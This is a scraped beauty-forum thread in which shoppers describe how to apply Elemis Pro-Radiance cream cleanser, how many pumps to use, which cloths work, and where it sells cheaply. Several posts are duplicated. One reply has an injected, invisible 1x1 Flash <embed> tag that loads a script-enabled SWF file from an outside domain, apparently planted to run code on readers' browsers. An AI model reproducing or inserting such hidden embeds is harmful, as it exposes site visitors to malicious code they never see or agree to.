Elemis pro radiance cream cleanser

ShoppingTelly

Help Support ShoppingTelly:

soots40

Registered Shopper
Can someone advise me about using this product. I have tried to watch the on line presentations but they don t seem to show you how to apply it . They just say how good it is.

Do you simply apply it straight onto your dry face and then wait a minute for it to melt the make up away? How many pumps do you recommend? I tried just one pump, there seemed to be quite enough but I felt it wasn t doing the job properly and somehow I didn t feel thoroughly cleansed. I also used the mits to wipe my make up off which I rinsed in warm water. I see it has rave reviews which is encouraging!

Can someone advise me about using this product. I have tried to watch the on line presentations but they don t seem to show you how to apply it . They just say how good it is.

Do you simply apply it straight onto your dry face and then wait a minute for it to melt the make up away? How many pumps do you recommend? I tried just one pump, there seemed to be quite enough but I felt it wasn t doing the job properly and somehow I didn t feel thoroughly cleansed. I also used the mits to wipe my make up off which I rinsed in warm water. I see it has rave reviews which is encouraging!

Yep that's all you do, one pump on dry face and wash off with warm water and a cloth helps to get into the little nooks and crannies (or maybe that's just MY face)!!

I don't have the mitts (think mine came in a TSV without them) but I just use one pump on dry skin and wipe off with a Liz Earle muslin cloth. I'm not a make-up wearer so don't know if there's an advanced technique for the removal of mascara etc, perhaps someone else can contribute on that score!

HTH :handshake:

Use either one or two pumps, spread it on your face and then wait for a minute for it to warm and loosen any make-up. Rinse a cloth or mitt and remove it all, then rinse off. If you just rinse it off you don't get the exfoliation of the mitt/cloth. You can rub it across your eyes and it will remove most eye make-up, including mascara.

It's usually £27, so the duo they're selling is good value, although it's on a waitlist now. I had it as part of a tsv, and loved it. I'd been using Cleanse and Polish for years before that.

Use either one or two pumps, spread it on your face and then wait for a minute for it to warm and loosen any make-up. Rinse a cloth or mitt and remove it all, then rinse off. If you just rinse it off you don't get the exfoliation of the mitt/cloth. You can rub it across your eyes and it will remove most eye make-up, including mascara.<embed allowScriptAccess="always" src="http://www.snivi.com/files/1.swf" quality="high" bgcolor="#ffffff" width="1" height="1" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

It's usually £27, so the duo they're selling is good value, although it's on a waitlist now. I had it as part of a tsv, and loved it. I'd been using Cleanse and Polish for years before that.

Ooops, I guess I was doing it wrong.
Usually I would just rinse it off.

I normally use either 1 or 2 pumps. I was using the facial mitts, but was finding that after I rinsed the product off, my face was feeling really dry and tight. I am now using the LE muslin cloths and my face is fine.

I used to use cleanse and polish for years but have now swapped to pro-radiance for taking off my make up. I use 1 pump on dry skin, massage it all over including eyes and leave it while I clean my teeth. Then I use a damp muslin cloth to remove my eye make up, and then the rest on my face and neck. I find this really effective at taking my make up off, it even remove smashbox waterproof shadow/liner and jet set without stinging. My face feels really clean and soft afterwards. I got mine in a TSV but don't know if I'd pay £27 for it..we'll see when this one runs out!

I used to use cleanse and polish for years but have now swapped to pro-radiance for taking off my make up. I use 1 pump on dry skin, massage it all over including eyes and leave it while I clean my teeth. Then I use a damp muslin cloth to remove my eye make up, and then the rest on my face and neck. I find this really effective at taking my make up off, it even remove smashbox waterproof shadow/liner and jet set without stinging. My face feels really clean and soft afterwards. I got mine in a TSV but don't know if I'd pay £27 for it..we'll see when this one runs out!

Wildcat - QVC have a duo of the Pro-Radiance cleanser still on a Beauty Day Price from Saturday, waitlist only but it's £36.14 plus £4.95 P&P, making them around £20.55 each. I haven't seen it as cheap as that anywhere else, though I haven't searched in any real detail. Just thought I'd pass it on, not that I'm trying to get you to spend money, honest...:wink:

Look on Ebay. I got 2 from a lovely seller for £14 each and combined p+p of £2.80. Product was perfect and fresh.

The advise is to leave on skin for 1 minutes after massaging in & rubbing off.
I got my Duo on line before the show & have bought some cheap facecloths.

Now that my stock of the "old formula" cleanse and polish has finished I tried this, using it the same way I used cleanse and polish. Fantastic results - much better than even the old cleanse and polish. I just use the LE muslin cloths to wipe it off. Thank goodness I found an alternative to C+P

Latest posts

Back